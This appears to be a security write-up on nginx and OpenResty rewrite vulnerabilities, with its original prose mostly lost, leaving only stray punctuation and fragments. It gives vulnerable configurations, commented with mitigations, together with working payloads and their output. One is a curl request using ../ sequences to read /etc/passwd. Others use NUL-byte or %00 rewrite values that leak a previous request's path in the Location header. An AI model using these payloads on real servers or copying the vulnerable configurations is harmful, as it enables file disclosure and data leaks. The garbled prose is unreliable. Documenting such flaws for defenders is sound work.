- nginx rewrite directory traversal ( SSRF) , , Nginx Amplify Gixy (, , ). OpenResty , .
:
# Regex location: any URI containing "/rewrite" is rewritten to the raw
# value of the query argument "x" ($arg_x), with no validation at all.
# The replacement is therefore attacker-controlled: the "../" sequences
# in the curl request below traverse out of the document root, and a
# replacement starting with a scheme (http://, $scheme) would make nginx
# answer with an external redirect instead of an internal rewrite.
# Mitigation: validate $arg_x against an allow-list pattern (e.g. an
# `if ($arg_x !~ ^/[A-Za-z0-9/_-]+$) { return 400; }` guard) or map it
# through a fixed table rather than using it verbatim.
location ~ /rewrite {
rewrite ^.*$ $arg_x;
}
# Fallback location: serves the (already rewritten) URI from the "html"
# directory. Because the rewrite above substitutes an unvalidated path,
# the "../" components escape this root — the curl output below shows
# /etc/passwd being returned by this block.
location / {
root html;
index index.html index.htm;
}
curl localhost:8337/rewrite?x=/../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
- nginx , , rewrite . nginx , , , , , . .
(`^@` denotes a NUL byte)
# The replacement string contains a literal NUL byte (rendered as ^@).
# As the curl transcript below shows, the redirect's Location header
# then carries "/secret" — the path of an earlier, unrelated request —
# so the header is presumably being built from memory left over from
# that request rather than from this replacement. Treat any NUL byte
# reaching a rewrite replacement as a defect: keep replacements static,
# and never assemble them from request-supplied data.
location ~ /memleak {
rewrite ^.*$ "^@asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdasdf";
}
# Fallback static location, identical to the first example. It serves
# the "/secret" request issued first in the transcript below; the
# following "/memleak" request is what leaks that path.
location / {
root html;
index index.html index.htm;
}
curl localhost:8337/secret -vv
...
curl localhost:8337/memleak -vv
...
Location: http://localhost:8337/secret
...
- Nginx GET- rewrite GET-. nginx . POST . OpenResty GET POST , POST OpenResty .
:
# OpenResty variant: the rewrite target comes from the POST body rather
# than the query string (a body is normally not recorded in access logs
# the way a query string is), but the same unvalidated-input problem
# applies.
location ~ /memleak {
rewrite_by_lua_block {
-- The body must be read explicitly before get_post_args() can see it.
ngx.req.read_body();
-- The err return value is never checked, so a failed parse goes unnoticed.
local args, err = ngx.req.get_post_args();
-- args["url"] is passed verbatim: a missing parameter yields nil (a Lua
-- error at request time), and a %00 in the value — see the curl example
-- below — reproduces the memory leak of the plain rewrite variant. The
-- second argument (jump=true) re-runs location matching on the new URI.
-- Validate the value against an allow-list before calling set_uri.
ngx.req.set_uri( args["url"], true );
}
}
# Fallback static location, identical to the earlier examples; the
# URI set by the Lua block above is matched here after the jump.
location / {
root html;
index index.html index.htm;
}
:
curl localhost:8337 -d "url=secret" -vv
...
curl localhost:8337 -d "url=%00asdfasdfasdfasdfasdfasdfasdfasdf" -vv
...
Location: http://localhost:8337/{... secret...}
...